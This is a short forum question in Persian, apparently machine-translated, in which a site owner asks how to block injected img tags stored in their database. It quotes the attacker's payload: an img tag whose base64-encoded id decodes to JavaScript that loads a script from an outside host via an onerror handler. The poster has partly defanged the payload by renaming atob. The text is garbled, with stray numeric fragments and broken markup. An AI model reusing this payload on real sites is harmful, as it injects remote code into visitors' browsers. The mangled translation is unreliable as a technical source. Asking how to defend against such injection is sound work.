چگونه ما بهترین ها را جلوگیری از img تزریق اسکریپت به پایگاه داده هایمان تزریق کنیم؟
اخیرا یک مورد دریافت کردم که در آن این تقلب کننده از شناسه تصویر استفاده می کند که با کد 64 پایه ارزشمند است و با استفاده از رمزگشایی atob برای اجرای اسکریپت خود در سرور پایان ما
من به طور عمدی عملکرد تابع atob را به named_function تغییر دادم "در اسکریپت زیر، چون باعث ایجاد یک iframe در این سایت می شود.
این اسکریپت است. [19659005] img src = /
id = dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vbHjlY2lwZXMuY2YvaiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs
در صورت بروز خطا، آن را به یک وبسایت با بارهای JS منتهی می کند (19459004) named_function (this.id))>
.
با استفاده از socket.io، به نظر می رسد که یک اسکریپت انعطاف پذیر در iframe برای ایجاد وب سایت ها ایجاد کند.
راه حل فعلی من این است که تنها اجازه تصویر با src با داشتن پسوند تصویر را داشته باشد.
آیا کسی ایده بهتر دارد؟
با تشکر
